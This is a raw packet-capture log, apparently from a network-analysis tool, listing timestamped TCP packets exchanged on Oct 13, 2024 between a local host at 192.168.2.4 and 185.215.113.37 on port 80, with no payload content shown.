Oct 13, 2024 17:46:18.187982082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.187999010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.187999010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188004017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188016891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188028097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188028097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188028097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188039064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188050985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188069105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188076019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188076019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188081980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188095093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188096046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188107967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188119888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188119888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188133001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188141108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188168049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188184023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188184023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188184023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188184023 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188185930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188231945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188231945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188235998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188263893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188276052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188287020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188373089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188373089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188410997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188421965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188432932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188442945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188455105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188466072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188477039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188488007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188488007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188488007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188488007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188508987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188519955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188529968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188546896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188561916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188571930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188571930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188571930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188571930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188571930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188582897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188601017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188612938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188625097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188628912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188628912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188628912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188637972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188648939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188659906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188689947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188700914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188704014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188704014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188704014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188704014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188713074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188724995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188735962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188746929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188781023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188785076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188785076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188785076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188785076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188796997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188839912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188839912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188841105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188853979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188874006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188874960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188885927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188888073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188900948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.188946962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188946962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188946962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.188998938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.189011097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.189023018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.189034939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.189040899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.189047098 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.189064980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.189071894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.189095974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.189193010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.189261913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.289800882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289843082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289863110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289875031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289885044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289896011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289967060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289978981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.289989948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290019035 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290030003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290040970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290043116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290043116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290043116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290043116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290043116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290055990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290092945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290149927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290154934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290167093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290178061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290188074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290199995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290209055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290210962 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290221930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290225029 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290239096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290272951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290272951 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290294886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290306091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290314913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290326118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290329933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290329933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290344954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290364027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290374994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290390015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290445089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290445089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290445089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290445089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290795088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290807009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290858030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290860891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290870905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290882111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290894032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290904045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290911913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290915966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.290939093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.290962934 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.391153097 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.396126986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.618590117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.618617058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.618627071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.618885040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.618885040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.789535046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.789549112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.789670944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867084026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867113113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867165089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867168903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867168903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867177010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867196083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867206097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867217064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867228031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867244005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867254019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867265940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867294073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867294073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867294073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867336035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867336035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867546082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867563009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867574930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867584944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867595911 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867666006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867666006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867666006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867671013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867682934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867693901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867711067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867722988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867733955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867744923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867757082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867773056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867773056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867773056 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867794991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867810011 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867824078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867827892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867840052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867876053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867886066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867887020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867887020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867906094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867918015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867918015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867930889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867930889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867943048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.867973089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.867973089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868020058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868031979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868041992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868052006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868063927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868081093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868092060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868102074 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868118048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868128061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868129015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868129015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868129015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868140936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868155003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868165970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868189096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868212938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868212938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868212938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868212938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868273020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868285894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868321896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868331909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868343115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868360043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868360043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868360043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868360043 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868387938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868397951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868408918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868418932 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868428946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868453026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868464947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868474960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868484974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868484974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868484974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868484974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868527889 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868540049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868550062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868560076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868571043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868581057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868591070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868613958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868613958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868613958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868619919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868630886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868643999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868654966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868671894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868671894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868671894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868706942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868719101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868737936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868737936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868768930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868781090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868791103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868803024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868815899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868815899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868841887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868855953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868866920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868876934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868889093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868901014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868911982 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868937969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.868942022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868942022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868942022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.868942022 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869071960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869071960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869098902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869110107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869121075 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869131088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869142056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869158030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869168043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869179010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869189978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869199991 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869209051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869209051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869209051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869209051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869210958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869221926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869234085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869239092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869260073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869260073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:18.869270086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869281054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:18.869415998 CEST	80	49730	185.215.113.37	192.168.2.4
